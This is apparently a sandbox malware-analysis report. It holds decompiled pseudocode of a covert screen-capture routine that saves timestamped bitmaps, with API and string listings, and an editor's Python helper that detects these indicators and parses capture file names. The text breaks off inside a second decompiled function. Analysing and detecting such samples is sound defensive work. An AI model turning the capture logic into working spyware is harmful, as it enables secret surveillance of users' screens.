
    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E004249DD() {
    				void* __ebx;
    				int _t212;
    				intOrPtr _t214;
    				void* _t215;
    				void* _t222;
    				CHAR** _t227;
    				CHAR* _t230;
    				void* _t231;
    				struct HDC__* _t232;
    				CHAR* _t233;
    				char _t234;
    				CHAR* _t236;
    				CHAR** _t239;
    				CHAR* _t240;
    				char _t241;
    				CHAR* _t242;
    				void* _t243;
    				struct HDC__* _t245;
    				void* _t253;
    				void* _t254;
    				void* _t256;
    				void* _t257;
    				void* _t266;
    				void* _t269;
    				void* _t270;
    				void* _t271;
    				CHAR** _t277;
    				void* _t287;
    				void* _t288;
    				void* _t289;
    				void* _t324;
    				void* _t325;
    				intOrPtr _t367;
    				void* _t368;
    				void* _t370;
    				signed int _t372;
    				struct HDC__* _t376;
    				void* _t381;
    				void* _t383;
    				intOrPtr _t384;
    				CHAR* _t386;
    
    				E0043E4E0(0x442919, _t381);
    				_t384 = _t383 - 0x12c;
    				_t367 =  *((intOrPtr*)(_t381 + 8));
    				 *((intOrPtr*)(_t381 - 0x10)) = _t384;
    				_t388 =  *((intOrPtr*)(_t367 + 0x14b));
    				if( *((intOrPtr*)(_t367 + 0x14b)) != 0) {
    					_push(_t367);
    					E004247C9(_t388);
    				}
    				_t376 = CreateDCA("DISPLAY", 0, 0, 0);
    				 *(_t381 - 0x14) = _t376;
    				 *(_t381 - 0x28) = CreateCompatibleDC(_t376);
    				_t368 = CreateCompatibleBitmap(_t376,  *((intOrPtr*)(_t367 + 0x760)) -  *((intOrPtr*)(_t367 + 0x758)),  *((intOrPtr*)(_t367 + 0x764)) -  *((intOrPtr*)(_t367 + 0x75c)));
    				if(_t368 != 0) {
    					 *(_t381 - 0x18) = SelectObject( *(_t381 - 0x28), _t368);
    					GetObjectA(_t368, 0x18, _t381 - 0xa8);
    					_t212 = BitBlt( *(_t381 - 0x28), 0, 0,  *(_t381 - 0xa4),  *(_t381 - 0xa0),  *(_t381 - 0x14),  *( *((intOrPtr*)(_t381 + 8)) + 0x758),  *( *((intOrPtr*)(_t381 + 8)) + 0x75c), 0xcc0020);
    					__eflags = _t212;
    					if(_t212 != 0) {
    						_push(_t381 - 0x1c);
    						L0043E162();
    						_t214 =  *((intOrPtr*)(_t381 + 8));
    						__eflags =  *(_t214 + 0x139);
    						if( *(_t214 + 0x139) != 0) {
    							 *(_t381 - 0x3c) =  *(_t381 - 0xa4);
    							 *(_t381 - 0x38) =  *(_t381 - 0xa0);
    							_push(_t381 - 0x3c);
    							_push(_t381 - 0x1c);
    							_push( *(_t381 - 0x28));
    							E00424571();
    							_t384 = _t384 + 0xc;
    						}
    						_t215 = L00401E60(_t381 - 0x48);
    						 *(_t381 - 4) = 0;
    						L00402414(_t215, 0, _t368, 0);
    						SelectObject( *(_t381 - 0x28),  *(_t381 - 0x18));
    						DeleteObject(_t368);
    						DeleteDC( *(_t381 - 0x14));
    						DeleteDC( *(_t381 - 0x28));
    						_push("temporary.bmp");
    						_push(0x4558c8);
    						L0043DE20();
    						 *(_t381 - 4) = 1;
    						_t222 = L00402673(_t381 - 0x18, 0,  *(_t381 - 0x18), _t381 - 0x18);
    						 *(_t381 - 4) = 0;
    						L0043DD36();
    						L004020B9(_t222, 0, 0x190, 0x123);
    						_push("th_temp.bmp");
    						_push(0x4558c8);
    						L0043DE20();
    						 *(_t381 - 4) = 2;
    						L00402673(_t381 - 0x18, 0,  *(_t381 - 0x18), _t381 - 0x18);
    						 *(_t381 - 4) = 0;
    						L0043DD36();
    						L00401E8D(_t381 - 0x48);
    						_push("dt");
    						_t227 = _t381 - 0x18;
    						_push(0x4558c4);
    						_push(_t227);
    						L0043DE20();
    						CreateDirectoryA( *_t227, 0);
    						L0043DD36();
    						L0043DDD8();
    						 *(_t381 - 4) = 3;
    						L0043DDD8();
    						 *(_t381 - 4) = 4;
    						_t230 = GetTickCount();
    						_push(0);
    						 *(_t381 - 0x14) = _t230;
    						L0043E288();
    						_t231 =  *_t230;
    						_push(0);
    						 *(_t381 - 0x18) = _t231;
    						L0043E288();
    						_t232 =  *(_t231 + 4);
    						_push(0);
    						 *(_t381 - 0x28) = _t232;
    						L0043E288();
    						_t233 =  *(_t232 + 8);
    						_push(0);
    						 *(_t381 - 0x30) = _t233;
    						L0043E288();
    						_t234 = _t233[0xc];
    						_push(0);
    						 *(_t381 - 0x34) = _t234;
    						L0043E288();
    						_push(0);
    						_t236 =  *((intOrPtr*)(_t234 + 0x10)) + 1;
    						 *(_t381 - 0x38) = _t236;
    						L0043E288();
    						_push( *(_t381 - 0x14));
    						_push( *(_t381 - 0x18));
    						_push( *(_t381 - 0x28));
    						_push( *(_t381 - 0x30));
    						_push( *(_t381 - 0x34));
    						_push( *(_t381 - 0x38));
    						_push(_t236[0x14] + 0x76c);
    						_t239 = _t381 - 0x20;
    						_push("%d-%02d-%02d_%02d-%02d-%02d-%d");
    						_push(_t239);
    						L0043E174();
    						_push(0);
    						L0043E288();
    						_t240 =  *_t239;
    						_push(0);
    						 *(_t381 - 0x38) = _t240;
    						L0043E288();
    						_t241 = _t240[4];
    						_push(0);
    						 *(_t381 - 0x34) = _t241;
    						L0043E288();
    						_t242 =  *(_t241 + 8);
    						_push(0);
    						 *(_t381 - 0x30) = _t242;
    						L0043E288();
    						_t243 = _t242[0xc];
    						_push(0);
    						 *(_t381 - 0x18) = _t243;
    						L0043E288();
    						_push(0);
    						_t245 =  *((intOrPtr*)(_t243 + 0x10)) + 1;
    						 *(_t381 - 0x28) = _t245;
    						L0043E288();
    						_push( *(_t381 - 0x14));
    						_push( *(_t381 - 0x38));
    						_push( *(_t381 - 0x34));
    						_push( *(_t381 - 0x30));
    						_push( *(_t381 - 0x18));
    						_push( *(_t381 - 0x28));
    						_push( *((intOrPtr*)(_t245 + 0x14)) + 0x76c);
    						_push("th_%d-%02d-%02d_%02d-%02d-%02d-%d");
    						_push(_t381 - 0x24);
    						L0043E174();
    						_t386 = _t384 + 0x44;
    						 *(_t381 - 0x38) = _t386;
    						_push("temporary.bmp");
    						_push(0x4558c8);
    						_push(_t386);
    						L0043DE20();
    						_t324 = _t381 - 0x138;
    						L00401000(0, _t324, __eflags);
    						_push(_t324);
    						 *(_t381 - 4) = 5;
    						 *(_t381 - 0x38) = _t386;
    						_push("th_temp.bmp");
    						_push(0x4558c8);
    						_push(_t386);
    						L0043DE20();
    						_t325 = _t381 - 0xf0;
    						L00401000(0, _t325, __eflags);
    						_push("dt");
    						_t253 = _t381 - 0x34;
    						_push(0x4558c4);
    						_push(_t253);
    						 *(_t381 - 4) = 6;
    						L0043DE20();
    						_push(0x5c);
    						_push(_t253);
    						_t254 = _t381 - 0x38;
    						 *(_t381 - 4) = 7;
    						_push(_t254);
    						L0043E14A();
    						_push(_t325);
    						 *(_t381 - 0x30) = _t386;
    						_push(_t381 - 0x20);
    						_push(_t254);
    						_push(_t386);
    						 *(_t381 - 4) = 8;
    						L0043E282();
    						E00403BE8(_t381 - 0x58);
    						 *(_t381 - 4) = 0xb;
    						L0043DD36();
    						 *(_t381 - 4) = 0xa;
    						L0043DD36();
    						_push("dt");
    						_t256 = _t381 - 0x18;
    						_push(0x4558c4);
    						_push(_t256);
    						L0043DE20();
    						_push(0x5c);
    						_push(_t256);
    						_t257 = _t381 - 0x30;
    						 *(_t381 - 4) = 0xc;
    						_push(_t257);
    						L0043E14A();
    						_push(_t381 - 0x34);
    						 *(_t381 - 0x14) = _t386;
    						_push(_t381 - 0x24);
    						_push(_t257);
    						_push(_t386);
    						 *(_t381 - 4) = 0xd;
    						L0043E282();
    						E00403BE8(_t381 - 0x68);
    						 *(_t381 - 4) = 0x10;
    						L0043DD36();
    						 *(_t381 - 4) = 0xf;
    						L0043DD36();
    						E0040343E(_t381 - 0x90, __eflags);
    						_t370 = 1;
    						 *(_t381 - 4) = 0x11;
    						 *((intOrPtr*)(_t381 - 0x84)) = 0;
    						 *(_t381 - 0x6c) = 0x4558c4;
    						E004034A9(_t381 - 0x90, 0);
    						E0040349F(_t381 - 0x90, _t370);
    						E00403495(_t381 - 0x90,  *((intOrPtr*)( *((intOrPtr*)(_t381 + 8)) + 0x690)));
    						L0043DD4E();
    						_push(_t381 - 0x58);
    						_push(_t381 - 0x138);
    						 *(_t381 - 4) = 0x13;
    						_t266 = E004034B3(_t381 - 0x90);
    						__eflags = _t266 - 2;
    						if(_t266 == 2) {
    							L11:
    							 *0x4558fc = 0;
    							 *(_t381 - 4) = 0x11;
    							L0043DD48();
    							 *(_t381 - 4) = 0xf;
    							E0040348A(_t381 - 0x90);
    							 *(_t381 - 4) = 0xa;
    							E00403C41(_t381 - 0x68, __eflags);
    							 *(_t381 - 4) = 6;
    							_t269 = E00403C41(_t381 - 0x58, __eflags);
    							 *(_t381 - 4) = 5;
    							_t270 = L0040107F(_t269, 0, _t381 - 0xf0);
    							 *(_t381 - 4) = 4;
    							_t271 = L0040107F(_t270, 0, _t381 - 0x138);
    							 *(_t381 - 4) = 3;
    							L0043DD36();
    							 *(_t381 - 4) = 0;
    							L0043DD36();
    							_t195 = _t381 - 4;
    							 *_t195 =  *(_t381 - 4) | 0xffffffff;
    							__eflags =  *_t195;
    							L00402B07(_t271, 0);
    							goto L14;
    						} else {
    							_t372 = 0x11;
    							 *(_t381 - 4) = 0x4558c4;
    							L0043DD48();
    							L0043DD4E();
    							_push(_t381 - 0x68);
    							_push(_t381 - 0xf0);
    							 *(_t381 - 4) = 0x16;
    							__eflags = E004034B3(_t381 - 0x90) - 2;
    							if(__eflags != 0) {
    								 *(_t381 - 4) = _t372;
    								L0043DD48();
    								_push("temporary.bmp");
    								_t277 = _t381 - 0x14;
    								_push(0x4558c8);
    								_push(_t277);
    								L0043DE20();
    								DeleteFileA( *_t277);
    								L0043DD36();
    								_push("th_temp.bmp");
    								L0043DE20();
    								DeleteFileA( *(_t381 - 0x14));
    								L0043DD36();
    								L0043E162();
    								 *( *((intOrPtr*)(_t381 + 8)) + 0x11c) =  *(_t381 - 0x14);
    								L0043DE20();
    								 *(_t381 - 4) = 0x18;
    								E0040BC5C( *((intOrPtr*)(_t381 + 8)), __eflags,  *((intOrPtr*)(_t381 + 8)));
    								 *(_t381 - 4) = 0x11;
    								L0043DD36();
    								 *0x4558fc = 0;
    								 *(_t381 - 4) = 0xf;
    								E0040348A(_t381 - 0x90);
    								 *(_t381 - 4) = 0xa;
    								E00403C41(_t381 - 0x68, __eflags);
    								 *(_t381 - 4) = 6;
    								_t287 = E00403C41(_t381 - 0x58, __eflags);
    								 *(_t381 - 4) = 5;
    								_t288 = L0040107F(_t287, 0, _t381 - 0xf0, _t381 + 8, 0x4558c8);
    								 *(_t381 - 4) = 4;
    								_t289 = L0040107F(_t288, 0, _t381 - 0x138, "pk.bin", _t381 - 0x14);
    								 *(_t381 - 4) = 3;
    								L0043DD36();
    								 *(_t381 - 4) = 0;
    								L0043DD36();
    								 *(_t381 - 4) =  *(_t381 - 4) | 0xffffffff;
    								L00402B07(_t289, 0, _t381 - 0x14, 0x4558c8);
    								_push(1);
    								_pop(0);
    							} else {
    								goto L11;
    							}
    						}
    					} else {
    						_push( *(_t381 - 0x14));
    						goto L6;
    					}
    				} else {
    					_push(_t376);
    					L6:
    					DeleteDC();
    					 *0x4558fc = 0;
    					L14:
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t381 - 0xc));
    				return 0;
    			}

    Address column: per-line instruction addresses from the Joe Sandbox IDA Plugin, spanning 0x004249e2 to 0x004250cb, which extraction separated from the code lines above; only the range is retained here.

    APIs
    • __EH_prolog.LIBCMT ref: 004249E2
    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00424A0F
    • CreateCompatibleDC.GDI32(00000000), ref: 00424A1B
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00424A3F
    • DeleteDC.GDI32(?), ref: 00424AA2
      • Part of subcall function 004247C9: __EH_prolog.LIBCMT ref: 004247CE
      • Part of subcall function 004247C9: #537.MFC42(\*.), ref: 004247E4
      • Part of subcall function 004247C9: #924.MFC42(?,004558C4,00448FA4,\*.), ref: 004247FF
      • Part of subcall function 004247C9: #922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042480E
      • Part of subcall function 004247C9: #800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042481A
      • Part of subcall function 004247C9: #800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00424826
      • Part of subcall function 004247C9: #3811.MFC42(?,?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042484A
      • Part of subcall function 004247C9: FindFirstFileA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00424860
      • Part of subcall function 004247C9: sscanf.MSVCRT ref: 0042489C
      • Part of subcall function 004247C9: sscanf.MSVCRT ref: 004248CA
      • Part of subcall function 004247C9: #551.MFC42(?,?,?,?,?,00000000,000000FF), ref: 004248EE
    • SelectObject.GDI32(?,00000000), ref: 00424A58
    • GetObjectA.GDI32(00000000,00000018,?), ref: 00424A67
    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00424A95
    • #3811.MFC42(?), ref: 00424AB7
    • SelectObject.GDI32(?,?), ref: 00424B07
    • DeleteObject.GDI32(00000000), ref: 00424B0A
    • DeleteDC.GDI32(?), ref: 00424B19
    • DeleteDC.GDI32(?), ref: 00424B1E
    • #924.MFC42(?,004558C8,temporary.bmp), ref: 00424B2F
    • #800.MFC42 ref: 00424B48
    • #924.MFC42(?,004558C8,th_temp.bmp), ref: 00424B69
    • #800.MFC42 ref: 00424B82
    • #924.MFC42(?,004558C4,00448FA4), ref: 00424B9E
    • CreateDirectoryA.KERNEL32(?,00000000,?,004558C4,00448FA4), ref: 00424BA7
    • #800.MFC42 ref: 00424BB0
    • #540.MFC42 ref: 00424BB8
    • #540.MFC42 ref: 00424BC4
    • GetTickCount.KERNEL32 ref: 00424BCD
    • #3337.MFC42(00000000), ref: 00424BDA
    • #3337.MFC42(00000000,00000000), ref: 00424BE8
    • #3337.MFC42(00000000,00000000,00000000), ref: 00424BF7
    • #3337.MFC42(00000000,00000000,00000000,00000000), ref: 00424C06
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000), ref: 00424C15
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C25
    • #2818.MFC42(?,%d-%02d-%02d_%02d-%02d-%02d-%d,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C4E
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C5A
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C68
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C77
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C86
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C95
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424CA5
    • #2818.MFC42(?,th_%d-%02d-%02d_%02d-%02d-%02d-%d,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424CCE
    • #924.MFC42(?,004558C8,temporary.bmp,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424CE2
    • #924.MFC42(?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424D03
    • #924.MFC42(?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp,?,?,00000000,00000000,00000000,00000000), ref: 00424D21
    • #923.MFC42(?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp,?,?,00000000), ref: 00424D31
    • #922.MFC42(?,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8), ref: 00424D46
      • Part of subcall function 00403BE8: __EH_prolog.LIBCMT ref: 00403BED
      • Part of subcall function 00403BE8: #535.MFC42(?), ref: 00403C12
      • Part of subcall function 00403BE8: #800.MFC42(?), ref: 00403C2B
    • #800.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp), ref: 00424D5A
    • #800.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp), ref: 00424D66
    • #924.MFC42(?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp), ref: 00424D75
    • #923.MFC42(?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424D85
    • #922.MFC42(?,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C), ref: 00424D9A
    • #800.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424DAE
    • #800.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424DBA
    • #268.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424E09
      • Part of subcall function 004034B3: __EH_prolog.LIBCMT ref: 004034B8
      • Part of subcall function 004034B3: #268.MFC42 ref: 004034CE
      • Part of subcall function 004034B3: #1567.MFC42 ref: 004034FA
      • Part of subcall function 004034B3: #268.MFC42 ref: 00403502
      • Part of subcall function 004034B3: #909.MFC42(?), ref: 0040351E
    • #1567.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424E34
    • #268.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424E3C
      • Part of subcall function 004034B3: #1567.MFC42 ref: 0040361C
      • Part of subcall function 004034B3: #5628.MFC42(?), ref: 0040362D
      • Part of subcall function 004034B3: #268.MFC42(?), ref: 00403635
      • Part of subcall function 004034B3: #1567.MFC42 ref: 00403657
      • Part of subcall function 004034B3: #800.MFC42 ref: 0040367C
    • #1567.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424E6B
    • #800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424EBC
    • #1567.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424ECC
    • #924.MFC42(?,004558C8,temporary.bmp,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?), ref: 00424EDB
    • DeleteFileA.KERNEL32(00000000,?,004558C8,temporary.bmp,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?), ref: 00424EE8
    • #800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424EED
    • #924.MFC42(?,004558C8,th_temp.bmp,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C), ref: 00424EFC
    • DeleteFileA.KERNEL32(00000000,?,004558C8,th_temp.bmp,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000), ref: 00424F03
    • #800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424F08
    • #3811.MFC42(?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4), ref: 00424F11
    • #924.MFC42(?,004558C8,pk.bin,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000), ref: 00424F2B
    • #800.MFC42(?,004558C8,pk.bin,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000), ref: 00424F44
    • #800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424F9B
    • #800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424FA6
    • #800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 004250AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#3337$#924$#1567Delete$#268$CreateH_prologObject$#3811#922File$#2818#540#923CompatibleSelectsscanf$#535#537#551#5628#909BitmapCountDirectoryFindFirstTick
    • String ID: %d-%02d-%02d_%02d-%02d-%02d-%d$DISPLAY$pk.bin$temporary.bmp$th_%d-%02d-%02d_%02d-%02d-%02d-%d$th_temp.bmp
    • API String ID: 3359607566-1333268707
    • Opcode ID: 5090970e2fea83d9ea59332c1c2de4851e15bcf1bc54da3e54dbb83a00fc6ec9
    • Instruction ID: c923f164fefbe73baed3eb1623ca8ff66ad1f3258f969fd77c229349aa9e9fa8
    • Opcode Fuzzy Hash: 5090970e2fea83d9ea59332c1c2de4851e15bcf1bc54da3e54dbb83a00fc6ec9
    • Instruction Fuzzy Hash: 0D126C71C00248EEDF05EBE5D885EEEBFB8AF19304F1040AAF50577292DB385A45DB69
    Uniqueness

    Uniqueness Score: -1.00%
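
    Triage helper added by the editor; it is not code from the sample, from MFC42, or from Joe Sandbox. It turns the API and String listings for the routine above into two checks an analyst can run offline. The first flags a byte buffer (a raw PE or a memory dump) that carries the GDI screen-capture cluster (CreateDCA on "DISPLAY", CreateCompatibleDC, CreateCompatibleBitmap, BitBlt, GetObjectA) together with the dropped-file names the report lists (temporary.bmp, th_temp.bmp, pk.bin and the two timestamp format strings); any one of those APIs alone is common in benign software, so the combination is the signal. The second parses a file name built from the `%d-%02d-%02d_%02d-%02d-%02d-%d` format. The field order follows the argument pushes in the decompiled routine, which read a struct tm: `+0x14` plus 0x76c is tm_year + 1900, `+0x10` plus 1 is tm_mon + 1, then tm_mday, tm_hour, tm_min, tm_sec. That the trailing `%d` is the GetTickCount value (the API listing shows the call just before the time fields are read), that an extension follows the name, and the match thresholds are assumptions; the `th_` prefix is reported as a flag without assuming what that variant is. The buffers in the block are constructed for the test, not taken from the sample.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Indicators copied from the report's API and String listings for the capture routine.
CAPTURE_APIS = [
    b"CreateDCA", b"CreateCompatibleDC", b"CreateCompatibleBitmap",
    b"BitBlt", b"GetObjectA", b"GetTickCount", b"DeleteFileA",
]
CAPTURE_STRINGS = [
    b"DISPLAY", b"temporary.bmp", b"th_temp.bmp", b"pk.bin",
    b"%d-%02d-%02d_%02d-%02d-%02d-%d",
    b"th_%d-%02d-%02d_%02d-%02d-%02d-%d",
]


def find_indicators(data: bytes) -> Dict[str, List[str]]:
    """Return which report API names and strings occur verbatim in the buffer."""
    return {
        "apis": [a.decode() for a in CAPTURE_APIS if a in data],
        "strings": [s.decode() for s in CAPTURE_STRINGS if s in data],
    }


def looks_like_capture_routine(data: bytes, min_apis: int = 4, min_strings: int = 2) -> bool:
    """Heuristic (thresholds are an assumption): require the GDI capture cluster
    AND the dropped-file names. BitBlt or GetObjectA on their own are not a signal."""
    hits = find_indicators(data)
    return len(hits["apis"]) >= min_apis and len(hits["strings"]) >= min_strings


# Field order from the decompiled pushes: year+1900, month+1, day, hour, minute,
# second, then a trailing integer assumed to be the GetTickCount value. GetTickCount
# is unsigned but printed with %d, so a value above 2^31 appears negative: allow '-'.
# The extension group is optional because the final name is not visible in the listing.
CAPTURE_NAME_RE = re.compile(
    r"^(?P<th>th_)?(?P<y>\d{4})-(?P<mo>\d{2})-(?P<d>\d{2})"
    r"_(?P<h>\d{2})-(?P<mi>\d{2})-(?P<s>\d{2})-(?P<tick>-?\d+)"
    r"(?P<ext>\.[A-Za-z0-9]+)?$"
)


def parse_capture_name(name: str) -> Optional[Tuple[datetime, int, bool]]:
    """Parse a dropped-file name in the routine's scheme.

    Returns (timestamp, tick, has_th_prefix), or None when the name does not match
    the format or encodes an impossible date (e.g. month 13)."""
    m = CAPTURE_NAME_RE.match(name)
    if not m:
        return None
    try:
        ts = datetime(int(m["y"]), int(m["mo"]), int(m["d"]),
                      int(m["h"]), int(m["mi"]), int(m["s"]))
    except ValueError:
        return None
    return ts, int(m["tick"]), m["th"] is not None


# Constructed stand-ins for a binary's string table (not the real sample): one that
# carries the whole cluster, one benign-looking buffer with only two of the APIs.
SAMPLE_BUFFER = b"\x00".join(CAPTURE_APIS + CAPTURE_STRINGS
                             + [b"MFC42.DLL", b"KERNEL32.dll", b"GDI32.dll"])
BENIGN_BUFFER = b"BitBlt\x00SelectObject\x00GetObjectA\x00Hello world\x00"


if __name__ == "__main__":
    print("sample:", find_indicators(SAMPLE_BUFFER), looks_like_capture_routine(SAMPLE_BUFFER))
    print("benign:", find_indicators(BENIGN_BUFFER), looks_like_capture_routine(BENIGN_BUFFER))
    for n in ("2021-02-22_14-05-33-1234567.bmp", "th_2021-02-22_14-05-33-7", "temporary.bmp"):
        print(n, "->", parse_capture_name(n))
```

The name parser is what you would run over a directory listing from an infected host: names that parse give the local capture time (the routine uses the local tm, not UTC) and a tick value that orders captures taken within the same second. The buffer check is deliberately verbatim string matching so it can be rewritten one-to-one as a YARA rule from the same listing.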

    C-Code - Quality: 69%
    			E00429A65(void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				short _t196;
    				void* _t197;
    				signed int _t200;
    				signed int _t209;
    				void* _t211;
    				void* _t214;
    				signed int _t223;
    				CHAR* _t234;
    				intOrPtr* _t236;
    				intOrPtr _t237;
    				void* _t238;
    				intOrPtr* _t241;
    				intOrPtr* _t245;
    				intOrPtr _t246;
    				void* _t247;
    				void* _t249;
    				void* _t250;
    				void* _t251;
    				void* _t252;
    				char* _t258;
    				void* _t278;
    				void* _t289;
    				void* _t329;
    				intOrPtr _t333;
    				signed int _t336;
    				void* _t339;
    				void* _t340;
    				void* _t342;
    				void* _t344;
    				intOrPtr _t346;
    				void* _t348;
    
    				_t329 = __edx;
    				E0043E4E0(0x4430fb, _t342);
    				L0043DDD8();
    				_t336 = 0;
    				 *(_t342 - 4) = 0;
    				L0043DDD8();
    				 *(_t342 - 4) = 1;
    				L0043DDD8();
    				 *(_t342 - 4) = 2;
    				L0043DDD8();
    				 *(_t342 - 4) = 3;
    				L0043DDD8();
    				 *(_t342 - 4) = 4;
    				L0043DDD8();
    				 *(_t342 - 4) = 5;
    				L0043DDD8();
    				 *(_t342 - 4) = 6;
    				 *((intOrPtr*)(_t342 - 0x2c)) = 0;
    				memset(_t342 - 0xa4, 0, 0x10);
    				memset(_t342 - 0x94, 0, 0x10);
    				memset(_t342 - 0xb4, 0, 0x10);
    				_t346 = _t344 - 0xe8 + 0x24;
    				 *(_t342 - 0xa4) = 0x7bc;
    				 *(_t342 - 0x94) = 0x7e4;
    				_t196 = 1;
    				 *((short*)(_t342 - 0x92)) = _t196;
    				 *((short*)(_t342 - 0x8e)) = _t196;
    				 *((short*)(_t342 - 0xa2)) = _t196;
    				 *((short*)(_t342 - 0x9e)) = _t196;
    				_t197 = L00404A04(_t196, _t342 - 0xf4, 0);
    				_push( *((intOrPtr*)(_t342 + 8)));
    				 *(_t342 - 4) = 7;
    				if(L00404D87(_t197, _t342 - 0xf4, 0) == 0) {
    					L32:
    					 *(_t342 - 4) = 6;
    					L00404A5A(_t198, _t342 - 0xf4, _t336);
